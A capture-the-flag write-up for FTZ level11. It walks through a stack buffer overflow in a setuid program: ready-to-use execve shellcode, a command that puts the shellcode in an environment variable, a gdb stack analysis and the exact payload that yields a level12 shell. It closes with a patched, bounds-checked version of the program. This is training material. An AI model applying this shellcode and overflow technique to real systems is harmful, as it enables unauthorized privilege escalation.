[FTZ] level11 writeup

Problem

Account: level11/what!@#$?

hint

#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* strcpy */
#include <unistd.h>     /* setreuid */

int main( int argc, char *argv[] )
{
        char str[256];          /* 256-byte stack buffer */

        setreuid( 3092, 3092 ); /* run as level12 (uid 3092) */
        strcpy( str, argv[1] ); /* unbounded copy of argv[1]: the overflow */
        printf( str );          /* argv[1] is used directly as the format string */
        return 0;
}

Solution

bof ์ทจ์•ฝ์ ์ด ์กด์žฌํ•ฉ๋‹ˆ๋‹ค. ์‰˜ ์ฝ”๋“œ๋ฅผ ์ž‘์„ฑํ•˜์—ฌ ์‰˜ ์ฝ”๋“œ ์ฃผ์†Œ๋กœ ret ์ฃผ์†Œ๋ฅผ ๋ฎ์–ด ์จ์„œ ๊ถŒํ•œ์„ ํƒˆ์ทจํ•ฉ๋‹ˆ๋‹ค.

I found the shellcode by googling.

\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80

Environment variable

The approach is to store the shellcode in an environment variable and point the return address at that environment variable.

1) Store the shellcode in an environment variable

[level11@ftz level11]$ export sh=$(python -c 'print("\x90"*10 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80")')


2) ํ™˜๊ฒฝ๋ณ€์ˆ˜์˜ ๋ฉ”๋ชจ๋ฆฌ ์ฃผ์†Œ ์•Œ์•„๋‚ด๊ธฐ

ํ™˜๊ฒฝ๋ณ€์ˆ˜์˜ ๋ฉ”๋ชจ๋ฆฌ ์ฃผ์†Œ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์ด ์ฝ”๋“œ๋ฅผ ์ž‘์„ฑํ•˜์—ฌ ์•Œ์•„๋ƒ…๋‹ˆ๋‹ค.

env.c

#include <stdio.h>
#include <stdlib.h>     /* getenv */

int main(int argc, char* argv[]){
    char *addr;
    if (argc < 2) {
        fprintf(stderr, "usage: %s VAR\n", argv[0]);
        return 1;
    }
    addr = (char*)getenv(argv[1]);   /* address of VAR's value inside the environment block */
    printf("located at %p\n",addr);
    return 0;
}

[level11@ftz tmp]$ gcc -o env env.c
[level11@ftz tmp]$ ./env sh
located at 0xbfffff2f

3) Change the ret address using the bof vulnerability

[level11@ftz level11]$ gdb -q attackme
(gdb) set disassembly-flavor intel
(gdb) disass main
Dump of assembler code for function main:
0x08048470 <main+0>:    push   ebp
0x08048471 <main+1>:    mov    ebp,esp
0x08048473 <main+3>:    sub    esp,0x108
0x08048479 <main+9>:    sub    esp,0x8
0x0804847c <main+12>:   push   0xc14
0x08048481 <main+17>:   push   0xc14
0x08048486 <main+22>:   call   0x804834c <setreuid>
0x0804848b <main+27>:   add    esp,0x10
0x0804848e <main+30>:   sub    esp,0x8
0x08048491 <main+33>:   mov    eax,DWORD PTR [ebp+12]
0x08048494 <main+36>:   add    eax,0x4
0x08048497 <main+39>:   push   DWORD PTR [eax]
0x08048499 <main+41>:   lea    eax,[ebp-264]
0x0804849f <main+47>:   push   eax
0x080484a0 <main+48>:   call   0x804835c <strcpy>
0x080484a5 <main+53>:   add    esp,0x10
0x080484a8 <main+56>:   sub    esp,0xc
0x080484ab <main+59>:   lea    eax,[ebp-264]
0x080484b1 <main+65>:   push   eax
0x080484b2 <main+66>:   call   0x804833c <printf>
0x080484b7 <main+71>:   add    esp,0x10
0x080484ba <main+74>:   leave
0x080484bb <main+75>:   ret
0x080484bc <main+76>:   nop
0x080484bd <main+77>:   nop
0x080484be <main+78>:   nop
0x080484bf <main+79>:   nop
End of assembler dump.
(gdb)

์Šคํƒ์˜ ๊ตฌ์กฐ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค.

str        256 bytes
dummy        8 bytes
saved ebp    4 bytes
ret          4 bytes

๋”ฐ๋ผ์„œ 268 ๋ฐ”์ดํŠธ์˜ ๋”๋ฏธ๋ฅผ ๋„ฃ์–ด์ฃผ๊ณ , ํ™˜๊ฒฝ๋ณ€์ˆ˜์˜ ์ฃผ์†Œ๋ฅผ ๋„ฃ์–ด์ฃผ๋ฉด ๋ฉ๋‹ˆ๋‹ค.

[level11@ftz level11]$ ./attackme $(python -c 'print("A"*268+"\x2f\xff\xff\xbf")')
sh-2.05b$ id
uid=3092(level12) gid=3091(level11) groups=3091(level11)
sh-2.05b$
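For comparison, a hardened counterpart of the hint program, written here as an added example (not code from the original writeup or from FTZ). It keeps the same 256-byte buffer but rejects any argument that does not fit, so the 268-byte path to ret is closed, and it passes the argument to printf as data rather than as the format string; the setreuid call is left out because it belongs to the challenge setup.

```c
/* Hardened counterpart of the level11 hint program (added example). */
#include <stdio.h>
#include <string.h>

#define STR_SIZE 256

/* Copy src into dst[dstsz] only if it fits together with its terminator.
 * Returns 0 on success, -1 if src is NULL or too long; on rejection dst is
 * left as an empty string, never partially written. */
int copy_arg_checked(char *dst, size_t dstsz, const char *src)
{
    size_t n = 0;

    if (src == NULL || dstsz == 0)
        return -1;
    /* Bounded scan: stop at dstsz so an unterminated src cannot run away. */
    while (n < dstsz && src[n] != '\0')
        n++;
    if (n == dstsz) {          /* no room for the NUL: reject, do not truncate */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);   /* n + 1 includes the terminator */
    return 0;
}

/* Same control flow as the hint's main(), minus the two bugs. */
int run(int argc, char *argv[])
{
    char str[STR_SIZE];

    if (argc < 2) {
        fprintf(stderr, "usage: attackme <string>\n");
        return 2;
    }
    /* Validate before the buffer is touched; oversized input is refused. */
    if (copy_arg_checked(str, sizeof str, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", STR_SIZE - 1);
        return 1;
    }
    printf("%s\n", str);       /* fixed format string; str is data only */
    return 0;
}

int main(int argc, char *argv[])
{
    return run(argc, argv);
}
```

A 268-byte argument like the one used above is now refused before strcpy-style copying can happen, and a `%x`-style argument is printed literally instead of being interpreted by printf.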
